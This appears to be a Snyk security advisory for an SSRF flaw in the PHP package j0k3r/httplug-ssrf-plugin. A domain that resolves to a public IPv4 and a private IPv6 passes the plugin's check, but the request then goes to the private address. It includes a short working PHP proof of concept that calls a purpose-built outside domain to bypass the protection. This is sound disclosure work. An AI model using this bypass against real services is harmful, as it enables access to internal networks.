Server-side Request Forgery (SSRF) Affecting j0k3r/httplug-ssrf-plugin package, versions >=0.0.0
Threat Intelligence
Exploit Maturity
Snyk has a proof-of-concept or detailed explanation of how to exploit this vulnerability.
Proof of concept
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applicationsSnyk Learn
Learn about Server-side Request Forgery (SSRF) vulnerabilities in an interactive lesson.
Start learning- Snyk IDSNYK-PHP-J0K3RHTTPLUGSSRFPLUGIN-8400871
- published9 Dec 2024
- disclosed4 Nov 2024
- creditPierre Rudloff
Introduced: 4 Nov 2024
CVE NOT AVAILABLE CWE-918 (opens in a new tab)Common Weakness Enumeration (CWE) is a category system for software weaknesses
How to fix?
There is no fixed version for j0k3r/httplug-ssrf-plugin.
Overview
Affected versions of this package are vulnerable to Server-side Request Forgery (SSRF) due to validating the IPv4 as safe but then the request will be made to the unsafe IPv6 address, when a domain resolves to a public IPv4 and a private IPv6.
PoC
<?php
use Graby\HttpClient\Plugin\ServerSideRequestForgeryProtection\Options;
use Graby\HttpClient\Plugin\ServerSideRequestForgeryProtection\ServerSideRequestForgeryProtectionPlugin;
use Http\Client\Common\PluginClient;
use Http\Discovery\HttpClientDiscovery;
use Http\Discovery\MessageFactoryDiscovery;
require_once __DIR__ . '/vendor/autoload.php';
$options = new Options();
$options->enablePinDns();
$pluginClient = new PluginClient(
HttpClientDiscovery::find(),
[new ServerSideRequestForgeryProtectionPlugin($options)]
);
// No SsrfException is thrown.
$pluginClient->sendRequest(
MessageFactoryDiscovery::find()->createRequest('GET', 'http://httplug-ssrf-plugin.netlib.re/')
);